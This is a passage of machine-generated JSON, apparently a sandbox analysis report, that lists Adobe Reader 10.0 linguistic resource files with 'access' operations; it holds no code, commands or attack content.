(x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\danphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\danphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\eng32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\eng32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\engphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\engphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 